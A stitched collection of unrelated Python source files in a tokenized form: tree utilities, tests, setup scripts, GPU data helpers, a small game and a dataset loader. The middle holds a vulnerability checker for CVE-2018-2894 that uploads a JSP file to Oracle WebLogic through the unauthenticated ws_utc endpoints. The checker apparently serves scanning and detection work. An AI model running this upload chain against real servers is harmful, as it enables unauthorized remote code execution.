[]
"""<line_sep><return>self._children[node]<block_end><def_stmt>get_siblings self node:T<arrow>List[T]<block_start>"""Get all siblings of ``node``, including ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_siblings('n2')
['n2', 'n3']
"""<line_sep>parent=self.get_parent(node)<line_sep><return>self._children[parent]<block_end><def_stmt>get_next_sibling self node:T<arrow>T<block_start>"""Return the node on the same level after ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_next_sibling('n2')
'n3'
>>> tree.get_next_sibling('n3') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: list index out of range
"""<line_sep>parent=self.get_parent(node)<line_sep>siblings=self._children[parent]<line_sep><return>siblings[siblings.index(node)+1]<block_end><def_stmt>get_previous_sibling self node:T<arrow>T<block_start>"""Return the node on the same level before ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_previous_sibling('n3')
'n2'
>>> tree.get_previous_sibling('n2') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: list index out of range
"""<line_sep>parent=self.get_parent(node)<line_sep>siblings=self._children[parent]<line_sep>index=siblings.index(node)-1<if_stmt>index<l>0<block_start><raise>IndexError("list index out of range")<block_end><return>siblings[index]<block_end><def_stmt>get_all_children self node:T<arrow>Iterable[T]<block_start>"""Iterate all children (and children of children and so forth)
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n2')
>>> tree.get_children('n1')
['n2']
>>> tree.get_all_children('n1') # doctest: +ELLIPSIS
<generator object Tree.get_all_children at 0x...>
>>> list(tree.get_all_children('n1'))
['n2', 'n3']
"""<line_sep>children=self.get_children(node)<for_stmt>c children<block_start><yield>c<line_sep><yield><from>self.get_all_children(c)<block_end><block_end><def_stmt>get_ancestors self node:T<arrow>Iterable[T]<block_start>"""Iterate all parents and parents of parents, etc.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n2')
>>> tree.get_parent('n3')
'n2'
>>> tree.get_ancestors('n3') # doctest: +ELLIPSIS
<generator object Tree.get_ancestors at 0x...>
>>> list(tree.get_ancestors('n3'))
['n2', 'n1']
>>> list(tree.get_ancestors('n1'))
[]
"""<line_sep>parent=self.get_parent(node)<while_stmt>parent<block_start><yield>parent<line_sep>parent=self.get_parent(parent)<block_end><block_end><def_stmt>order self items:Iterable[T]<arrow>Iterable[T]<block_start>items_set=set(items)<line_sep><return>(n<for>n self._nodes<if>n<in>items_set)<block_end><def_stmt>_add_to_nodes self node:T parent:Optional[T] index:Optional[int]=<none><arrow><none><block_start>"""Helper method to place nodes on the right location in the nodes list
Called only from add() and move()"""<line_sep>nodes=self._nodes<line_sep>siblings=self._children[parent]<try_stmt><block_start>atnode=siblings[index]# type: ignore[index]
<block_end><except_stmt>(TypeError IndexError)<block_start>index=len(siblings)<if_stmt>parent<block_start><try_stmt><block_start>next_uncle=self.get_next_sibling(parent)<block_end><except_stmt>IndexError# parent has no younger brothers..
# place it before the next uncle of grant_parent:
<block_start><return>self._add_to_nodes(node self.get_parent(parent))<block_end><else_stmt><block_start>nodes.insert(nodes.index(next_uncle) node)<block_end><block_end><else_stmt># append to root node:
<block_start>nodes.append(node)<block_end><block_end><else_stmt><block_start>nodes.insert(nodes.index(atnode) node)<block_end><block_end><def_stmt>_add self node:T parent:Optional[T]=<none> index:Optional[int]=<none><arrow><none><block_start>"""Helper method for both add() and move()."""<assert_stmt>node<not><in>self._nodes<line_sep>siblings=self._children[parent]<line_sep>self._add_to_nodes(node parent index)<line_sep># Fix parent-child and child-parent relationship
<try_stmt><block_start>siblings.insert(index node)# type: ignore[arg-type]
<block_end><except_stmt>TypeError<block_start>siblings.append(node)<block_end># Create new entry for it's own children:
<if_stmt>parent<block_start>self._parents[node]=parent<block_end><block_end><def_stmt>add self node:T parent:Optional[T]=<none> index:Optional[int]=<none><arrow><none><block_start>"""Add node to the tree. parent is the parent node, which may be None
if the item should be added to the root item.
For usage, see the unit tests.
"""<line_sep>self._add(node parent index)<line_sep>self._children[node]=[]<block_end><def_stmt>_remove self node:T<arrow><none># Remove from parent item
<block_start>self.get_siblings(node).remove(node)<line_sep># Remove data entries:
<del_stmt>self._children[node]<line_sep>self._nodes.remove(node)<try_stmt><block_start><del_stmt>self._parents[node]<block_end><except_stmt>KeyError<block_start><pass><block_end><block_end><def_stmt>remove self node:T<arrow><none><block_start>"""Remove ``node`` from the tree.
For usage, see the unit tests.
"""<line_sep># First remove children:
<for_stmt>c reversed(list(self._children[node]))<block_start>self.remove(c)<block_end>self._remove(node)<block_end><def_stmt>_reparent_nodes self node:T parent:Optional[T]<arrow><none><block_start>"""Helper for move().
The _children and _parent trees can be left intact as far as
children of the reparented node are concerned. Only the position
in the _nodes list changes.
"""<line_sep>self._nodes.remove(node)<line_sep>self._add_to_nodes(node parent)<for_stmt>c self._children[node]<block_start>self._reparent_nodes(c node)<block_end><block_end><def_stmt>move self node:T parent:Optional[T] index:Optional[int]=<none><arrow><none><block_start>"""Set new parent for a ``node``. ``Parent`` can be ``None``,
indicating it's added to the top.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.nodes
['n1', 'n2', 'n3']
>>> tree.move('n2', 'n3')
>>> tree.get_parent('n2')
'n3'
>>> tree.get_children('n3')
['n2']
>>> tree.nodes
['n1', 'n3', 'n2']
If a node contains children, those are also moved:
>>> tree.add('n4')
>>> tree.nodes
['n1', 'n3', 'n2', 'n4']
>>> tree.move('n1', 'n4')
>>> tree.get_parent('n1')
'n4'
>>> list(tree.get_all_children('n4'))
['n1', 'n3', 'n2']
>>> tree.nodes
['n4', 'n1', 'n3', 'n2']
"""<if_stmt>parent<is>self.get_parent(node)<block_start><return><block_end># Remove all node references:
old_parent=self.get_parent(node)<line_sep>self._children[old_parent].remove(node)<line_sep>self._nodes.remove(node)<if_stmt>old_parent<block_start><del_stmt>self._parents[node]<block_end>self._add(node parent index)<line_sep># reorganize children in nodes list
<for_stmt>c self._children[node]<block_start>self._reparent_nodes(c node)<block_end><block_end><block_end>
|
<import_stmt>pytest<import_stmt>fastapi_chameleon<as>fc<import_from_stmt>fastapi_chameleon.exceptions FastAPIChameleonException<def_stmt>test_cannot_decorate_with_missing_init <block_start>fc.engine.clear()<with_stmt>pytest.raises(FastAPIChameleonException)<block_start>@fc.template('home/index.pt')<def_stmt>view_method a b c<block_start><return>{"a":a "b":b "c":c}<block_end>view_method(1 2 3)<block_end><block_end><def_stmt>test_can_call_init_with_good_path test_templates_path<block_start>fc.global_init(str(test_templates_path) cache_init=<false>)<line_sep># Clear paths so as to no affect future tests
fc.engine.clear()<block_end><def_stmt>test_cannot_call_init_with_bad_path test_templates_path<block_start>bad_path=test_templates_path/"missing"<with_stmt>pytest.raises(Exception)<block_start>fc.global_init(str(bad_path) cache_init=<false>)<block_end><block_end>
|
<import_stmt>uuid<class_stmt>ObjectId(object)<block_start><def_stmt>__init__ self id=<none><block_start>super(ObjectId self).__init__()<if_stmt>id<is><none><block_start>self._id=uuid.uuid1()<block_end><else_stmt><block_start>self._id=uuid.UUID(id)<block_end><block_end><def_stmt>__eq__ self other<block_start><return>isinstance(other ObjectId)<and>other._id<eq>self._id<block_end><def_stmt>__ne__ self other<block_start><return><not>self<eq>other<block_end><def_stmt>__hash__ self<block_start><return>hash(self._id)<block_end><def_stmt>__repr__ self<block_start><return>'ObjectId({0})'.format(self._id)<block_end><def_stmt>__str__ self<block_start><return>str(self._id)<block_end><block_end>
|
<import_stmt>svox2<import_stmt>torch<import_stmt>numpy<as>np<import_from_stmt>util Timing<import_from_stmt>matplotlib pyplot<as>plt<line_sep>device='cuda:0'<line_sep>GRID_FILE='lego.npy'<line_sep>grid=svox2.SparseGrid(reso=256 device='cpu' radius=1.3256)<line_sep>data=torch.from_numpy(np.load(GRID_FILE)).view(-1 grid.data_dim)<line_sep>grid.sh_data.data=data[<ellipsis> 1:]<line_sep>grid.density_data.data=data[<ellipsis> :1]<line_sep># grid.resample(128, use_z_order=True)
grid=grid.cuda()<line_sep>c2w=torch.tensor([[-0.9999999403953552 0.0 0.0 0.0] [0.0 -0.7341099977493286 0.6790305972099304 2.737260103225708] [0.0 0.6790306568145752 0.7341098785400391 2.959291696548462] [0.0 0.0 0.0 1.0] ] device=device)<with_stmt>torch.no_grad()<block_start>width=height=800<line_sep>fx=fy=1111<line_sep>origins=c2w[<none> :3 3].expand(height<times>width -1).contiguous()<line_sep>yy,xx=torch.meshgrid(torch.arange(height dtype=torch.float64 device=c2w.device) torch.arange(width dtype=torch.float64 device=c2w.device) )<line_sep>xx=(xx-width<times>0.5)/float(fx)<line_sep>yy=(yy-height<times>0.5)/float(fy)<line_sep>zz=torch.ones_like(xx)<line_sep>dirs=torch.stack((xx -yy -zz) dim=-1)<line_sep>dirs<augdiv>torch.norm(dirs dim=-1 keepdim=<true>)<line_sep>dirs=dirs.reshape(-1 3)<del_stmt>xx yy zz<line_sep>dirs=torch.matmul(c2w[<none> :3 :3].double() dirs[<ellipsis> <none>])[<ellipsis> 0].float()<line_sep>dirs=dirs/torch.norm(dirs dim=-1 keepdim=<true>)<line_sep>rays=svox2.Rays(origins dirs)<for_stmt>i range(5)<block_start><with_stmt>Timing("ours")<block_start>im=grid.volume_render(rays use_kernel=<true>)<block_end><block_end>im=im.reshape(height width 3)<line_sep>im=im.detach().clamp_(0.0 1.0).cpu()<line_sep>plt.imshow(im)<line_sep>plt.show()<block_end>
|
# -*- coding: utf-8 -*-
"""Top-level package for nider."""<line_sep>__author__="""<NAME>"""<line_sep>__email__='<EMAIL>'<line_sep>__version__='0.5.0'<line_sep>
|
<import_stmt>time<import_from_stmt>logging getLogger<import_from_stmt>gym.wrappers Monitor<as>_GymMonitor<import_from_stmt>gym.wrappers.monitoring.stats_recorder StatsRecorder<as>_GymStatsRecorder<class_stmt>Monitor(_GymMonitor)<block_start>"""`Monitor` with PFRL's `ContinuingTimeLimit` support.
`Agent` in PFRL might reset the env even when `done=False`
if `ContinuingTimeLimit` returns `info['needs_reset']=True`,
which is not expected for `gym.Monitor`.
For details, see
https://github.com/openai/gym/blob/master/gym/wrappers/monitor.py
"""<def_stmt>_start self directory video_callable=<none> force=<false> resume=<false> write_upon_reset=<false> uid=<none> mode=<none> <block_start><if_stmt>self.env_semantics_autoreset<block_start><raise>NotImplementedError("Detect 'semantics.autoreset=True' in `env.metadata`, "<concat>"which means the env is from deprecated OpenAI Universe.")<block_end>ret=super()._start(directory=directory video_callable=video_callable force=force resume=resume write_upon_reset=write_upon_reset uid=uid mode=mode )<line_sep>env_id=self.stats_recorder.env_id<line_sep>self.stats_recorder=_StatsRecorder(directory "{}.episode_batch.{}".format(self.file_prefix self.file_infix) autoreset=<false> env_id=env_id )<if_stmt>mode<is><not><none><block_start>self._set_mode(mode)<block_end><return>ret<block_end><block_end><class_stmt>_StatsRecorder(_GymStatsRecorder)<block_start>"""`StatsRecorder` with PFRL's `ContinuingTimeLimit` support.
For details, see
https://github.com/openai/gym/blob/master/gym/wrappers/monitoring/stats_recorder.py
"""<def_stmt>__init__ self directory file_prefix autoreset=<false> env_id=<none> logger=getLogger(__name__) <block_start>super().__init__(directory file_prefix autoreset=autoreset env_id=env_id)<line_sep>self._save_completed=<true><line_sep>self.logger=logger<block_end><def_stmt>before_reset self<block_start><assert_stmt><not>self.closed<if_stmt>self.done<is><not><none><and><not>self.done<and>self.steps<g>0<block_start>self.logger.debug("Tried to reset the env which is not done=True. "<concat>"StatsRecorder completes the last episode.")<line_sep>self.save_complete()<block_end>self.done=<false><if_stmt>self.initial_reset_timestamp<is><none><block_start>self.initial_reset_timestamp=time.time()<block_end><block_end><def_stmt>after_step self observation reward done info<block_start>self._save_completed=<false><line_sep><return>super().after_step(observation reward done info)<block_end><def_stmt>save_complete self<block_start><if_stmt><not>self._save_completed<block_start>super().save_complete()<line_sep>self._save_completed=<true><block_end><block_end><def_stmt>close self<block_start>self.save_complete()<line_sep>super().close()<block_end><block_end>
|
<import_stmt>requests<line_sep># Vuln Base Info
<def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''Oracle WebLogic RCE''' "description":'''Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.''' "severity":"critical" "references":["https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/" "https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894"] "classification":{"cvss-metrics":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" "cvss-score":"" "cve-id":"CVE-2018-2894" "cwe-id":""} "metadata":{"vuln-target":"" } "tags":["cve" "cve2018" "oracle" "weblogic" "rce"] }<block_end># Vender Fingerprint
<def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept
<def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/ws_utc/resources/setting/options"""<line_sep>method="POST"<line_sep>data="""setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80"""<line_sep>headers={'Content-Type':'application/x-www-form-urlencoded'}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<line_sep>path="""/ws_utc/resources/setting/keystore"""<line_sep>method="POST"<line_sep>data="""------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_name"
{{randstr}}
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_edit_mode"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_front"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_changed"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2018-2894";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
//0x03 is equal to 0x3, but we need 0x03 for our md5sum
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
out.println(hashedpasswd.toString());
%>
------WebKitFormBoundaryuim0dyiDSPBPu31g--"""<line_sep>headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g'}<line_sep>resp1=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<line_sep>path="""/ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp"""<line_sep>method="GET"<line_sep>data=""""""<line_sep>headers={}<line_sep>resp2=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>("""26ec00a3a03f6bfc5226fd121567bb58"""<in>resp2.text)<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc()
<def_stmt>exp url<block_start><return>poc(url)<block_end># Utils
<def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end>
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for XLA Reverse Ops."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>itertools<import_stmt>numpy<as>np<import_from_stmt>tensorflow.compiler.tests xla_test<import_from_stmt>tensorflow.python.framework constant_op<import_from_stmt>tensorflow.python.framework dtypes<import_from_stmt>tensorflow.python.ops array_ops<import_from_stmt>tensorflow.python.platform googletest<class_stmt>ReverseOpsTest(xla_test.XLATestCase)<block_start><def_stmt>testReverseOneDim self<block_start>shape=(7 5 9 11)<for_stmt>revdim range(-len(shape) len(shape))<block_start>self._AssertReverseEqual([revdim] shape)<block_end><block_end><def_stmt>testReverseMoreThanOneDim self<block_start>shape=(7 5 9 11)<line_sep># The offset is used to test various (but not all) combinations of negative
# and positive axis indices that are guaranteed to not collide at the same
# index.
<for_stmt>revdims itertools.chain.from_iterable(itertools.combinations(range(-offset len(shape)-offset) k)<for>k range(2 len(shape)+1)<for>offset range(0 len(shape)))<block_start>self._AssertReverseEqual(revdims shape)<block_end><block_end><def_stmt>_AssertReverseEqual self revdims shape<block_start>np.random.seed(120)<line_sep>pval=np.random.randint(0 100 size=shape).astype(float)<with_stmt>self.session()<block_start><with_stmt>self.test_scope()<block_start>p=array_ops.placeholder(dtypes.int32 shape=shape)<line_sep>axis=constant_op.constant(np.array(revdims dtype=np.int32) shape=(len(revdims) ) dtype=dtypes.int32)<line_sep>rval=array_ops.reverse(p axis).eval({p:pval})<line_sep>slices=[slice(-1 <none> -1)<if>d<in>revdims<or>d-len(shape)<in>revdims<else>slice(<none>)<for>d range(len(shape))]<block_end>self.assertEqual(pval[slices].flatten().tolist() rval.flatten().tolist())<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>googletest.main()<block_end>
|
<import_stmt>os.path<try_stmt><block_start><import_from_stmt>setuptools setup<block_end><except_stmt>ImportError<block_start><import_from_stmt>distutils.core setup<block_end><def_stmt>read filename<block_start><return>open(os.path.join(os.path.dirname(__file__) filename)).read()<block_end>setup(name="elex" version="2.4.4" author="<NAME>, <NAME>" author_email="<EMAIL>, <EMAIL>" url="https://github.com/newsdev/elex" description="Client for parsing the Associated Press's elections API" long_description=read("README.rst") packages=["elex" "elex.cli" "elex.api" "tests"] entry_points={"console_scripts":("elex = elex.cli:main" )} license="Apache License 2.0" keywords="election race candidate democracy news associated press" install_requires=["CacheControl==0.12.*" "cement==2.10.2" "lockfile==0.12.2" "pymongo==3.3" "python-dateutil==2.7.*" "requests==2.20.*" "ujson==1.35" ] classifiers=["Development Status :: 5 - Production/Stable" "Intended Audience :: Developers" "Topic :: Software Development :: Libraries :: Python Modules" "Programming Language :: Python" "Programming Language :: Python :: 2" "Programming Language :: Python :: 2.7" "Programming Language :: Python :: 3" "Programming Language :: Python :: 3.6" ] )<line_sep>
|
##
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
'''
utils for examples
'''<import_stmt>cupy<as>cp<import_stmt>cudf<def_stmt>create_sorted_cudf_df ncols nrows start=0 step=1<block_start>df_local=cudf.DataFrame()<line_sep>data_start=start<for_stmt>i range(ncols)<block_start>df_local["col-"+str(i)]=cp.arange(start=data_start stop=data_start+nrows<times>step step=step dtype="int64")<line_sep>data_start<augadd>nrows<times>step<block_end><return>df_local<block_end><def_stmt>create_random_data_df ncols nrows low=0 high=1000000000000<block_start>df_local=cudf.DataFrame()<for_stmt>i range(ncols)<block_start>df_local["col-"+str(i)]=cp.random.randint(low=low high=high size=nrows dtype="int64")<block_end><return>df_local<block_end><def_stmt>random_data_df nrows col_lows=[0 100] col_highs=[100 200]<block_start>df_local=cudf.DataFrame()<for_stmt>i range(len(col_lows))<block_start>df_local["col-"+str(i)]=cp.random.randint(low=col_lows[i] high=col_highs[i] size=nrows dtype="int64")<block_end><return>df_local<block_end><import_stmt>string<import_stmt>random<def_stmt>random_str size=6 chars=string.ascii_uppercase+string.digits<block_start>"""
generate a random string with given size and char list
source: https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits?rq=1
"""<line_sep><return>''.join(random.choice(chars)<for>_ range(size))<block_end><def_stmt>create_random_str_df ncols nrows min_digits=2 max_digits=7<block_start>df_local=cudf.DataFrame()<for_stmt>i range(ncols)<block_start>df_local["col-"+str(i)]=[random_str(min_digits+i%(max_digits-min_digits))<for>i range(nrows)]<block_end><return>df_local<block_end><def_stmt>get_size df_size_str<block_start><if_stmt>df_size_str.endswith("MB")<block_start>df_size=df_size_str[:-2]<line_sep>df_size=int(df_size)<times>1000000<line_sep><return>df_size<block_end><elif_stmt>df_size_str.endswith("GB")<block_start>df_size=df_size_str[:-2]<line_sep>df_size=int(df_size)<times>1000000000<line_sep><return>df_size<block_end><else_stmt><block_start><raise>ValueError("Size has to be either MB or GB")<block_end><block_end><def_stmt>get_rows df_size_str ncols<block_start>df_size=get_size(df_size_str)<line_sep># each element is int64, so 8 bytes
<return>int(df_size/(ncols<times>8))<block_end>
|
# clue-verysimple-rpsgame v1.0
# CircuitPython rock paper scissors game simple text game
# based on https://www.youtube.com/watch?v=dhaaZQyBP2g
# Tested with CLUE and Circuit Playground Bluefruit (Alpha)
# and CircuitPython and 5.3.0
# copy this file to CLUE/CPB board as code.py
# MIT License
# Copyright (c) 2015 <NAME>, KidsCanCode LLC
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
<import_stmt>random<line_sep>moves=["r" "p" "s"]<line_sep>player_wins=["pr" "sp" "rs"]<line_sep>print("Rock, paper scissors game: enter first letter for move or q for quit")<while_stmt><true><block_start>player_move=input("Your move: ")<if_stmt>player_move<eq>"q"<block_start><break><block_end>computer_move=random.choice(moves)<line_sep>print("You:" player_move)<line_sep>print("Me:" computer_move)<if_stmt>player_move<eq>computer_move<block_start>print("Tie")<block_end><elif_stmt>player_move+computer_move<in>player_wins<block_start>print("You win!")<block_end><else_stmt><block_start>print("You lose!")<block_end><block_end>
|
<import_stmt>sys<import_stmt>os<try_stmt><block_start><import_from_stmt>unittest.mock MagicMock<block_end><except_stmt>ImportError<block_start><import_from_stmt>mock Mock<as>MagicMock<block_end><class_stmt>Mock(MagicMock)<block_start>@classmethod<def_stmt>__getattr__ cls name<block_start><return>Mock()<block_end><block_end>MOCK_MODULES=["numpy" "numpy.ma" "xarray" "cartopy" "pandas" "matplotlib" "netCDF4" "mpl_toolkits.basemap" "wrf._wrffortran"]<line_sep>sys.modules.update((mod_name Mock())<for>mod_name MOCK_MODULES)<line_sep>consts={"DEFAULT_FILL":9.9692099683868690E36 "DEFAULT_FILL_INT8":-127 "DEFAULT_FILL_INT16":-32767 "DEFAULT_FILL_INT32":-2147483647 "DEFAULT_FILL_INT64":-9223372036854775806 "DEFAULT_FILL_FLOAT":9.9692099683868690E36 "DEFAULT_FILL_DOUBLE":9.9692099683868690E36 "fomp_sched_static":1 "fomp_sched_dynamic":2 "fomp_sched_guided":3 "fomp_sched_auto":4}<class_stmt>MockWrfConstants(object)<block_start><def_stmt>__init__ self<block_start>self.__dict__=consts<block_end><block_end><def_stmt>mock_asscalar val<block_start><return>float(val)<block_end>sys.modules["wrf._wrffortran"].wrf_constants=MockWrfConstants()<line_sep>sys.modules["wrf._wrffortran"].omp_constants=MockWrfConstants()<line_sep>sys.modules["numpy"].asscalar=mock_asscalar<try_stmt><block_start><import_stmt>wrf<block_end><except_stmt>ImportError<block_start><pass><block_end>print(wrf.get_coord_pairs.__doc__)<line_sep>
|
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# classes, code related to Eret preamble sequence.
<import_from_stmt>base.Sequence Sequence<line_sep># -------------------------------------------------------------------------------------------------------
# EretPreambleSequence to provide base class for eret preamble sequence.
# -------------------------------------------------------------------------------------------------------
<class_stmt>EretPreambleSequence(Sequence)<block_start><def_stmt>__init__ self gen_thread<block_start>super().__init__(gen_thread)<block_end><def_stmt>generate self **kargs<block_start><pass><block_end><block_end>
|
# coding=utf-8
# Copyright 2021 RigL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Dataset Classes.
Dataset abstraction/factory to allow us to easily use tensorflow datasets (TFDS)
with JAX/FLAX, by defining a bunch of wrappers, including preprocessing.
"""<import_stmt>abc<import_from_stmt>typing MutableMapping Optional<import_stmt>tensorflow.compat.v2<as>tf<import_stmt>tensorflow_datasets<as>tfds<class_stmt>Dataset(metaclass=abc.ABCMeta)<block_start>"""Base class for datasets.
Attributes:
DATAKEY: The key used for the data component of a Tensorflow Dataset
(TFDS) sample, e.g. 'image' for image datasets.
LABELKEY: The key used fot the label component of a Tensorflow Dataset
sample, i.e. 'label'.
name: The TFDS name of the dataset.
batch_size: The batch size to use for the training dataset.
batch_size_test: The batch size to use for the test dataset.
num_classes: the number of supervised classes in the dataset.
shape: the shape of an input data array.
"""<line_sep>DATAKEY:Optional[str]=<none><line_sep>LABELKEY:str='label'<def_stmt>__init__ self name batch_size batch_size_test shuffle_buffer_size prefetch_size=1 seed=<none><block_start>"""Base class for datasets.
Args:
name: The TFDS name of the dataset.
batch_size: The batch size to use for the training dataset.
batch_size_test: The batch size to use for the test dataset.
shuffle_buffer_size: The buffer size to use for dataset shuffling.
prefetch_size: The number of mini-batches to prefetch.
seed: The random seed used to shuffle.
Returns:
A Dataset object.
"""<line_sep>super().__init__()<line_sep>self.name=name<line_sep>self.batch_size=batch_size<line_sep>self.batch_size_test=batch_size_test<line_sep>self._shuffle_buffer_size=shuffle_buffer_size<line_sep>self._prefetch_size=prefetch_size<line_sep>self._train_ds,self._train_info=tfds.load(self.name split=tfds.Split.TRAIN data_dir=self._dataset_dir() with_info=<true>)<line_sep>self._train_ds=self._train_ds.shuffle(self._shuffle_buffer_size seed).map(self.preprocess).cache().map(self.augment).batch(self.batch_size drop_remainder=<true>).prefetch(self._prefetch_size)<line_sep>self._test_ds,self._test_info=tfds.load(self.name split=tfds.Split.TEST data_dir=self._dataset_dir() with_info=<true>)<line_sep>self._test_ds=self._test_ds.map(self.preprocess).cache().batch(self.batch_size_test).prefetch(self._prefetch_size)<line_sep>self.num_classes=self._train_info.features['label'].num_classes<line_sep>self.shape=self._train_info.features['image'].shape<block_end><def_stmt>_dataset_dir self<block_start>"""Returns the dataset path for the TFDS data."""<line_sep><return><none><block_end><def_stmt>get_train self<block_start>"""Returns the training dataset."""<line_sep><return>iter(tfds.as_numpy(self._train_ds))<block_end><def_stmt>get_train_len self<block_start>"""Returns the length of the training dataset."""<line_sep><return>self._train_info.splits['train'].num_examples<block_end><def_stmt>get_test self<block_start>"""Returns the test dataset."""<line_sep><return>iter(tfds.as_numpy(self._test_ds))<block_end><def_stmt>get_test_len self<block_start>"""Returns the length of the test dataset."""<line_sep><return>self._test_info.splits['test'].num_examples<block_end><def_stmt>preprocess self data<block_start>"""Preprocessing fn used by TFDS map for normalization.
This function is for transformations that can be cached, e.g.
normalization/whitening.
Args:
data: Data sample.
Returns:
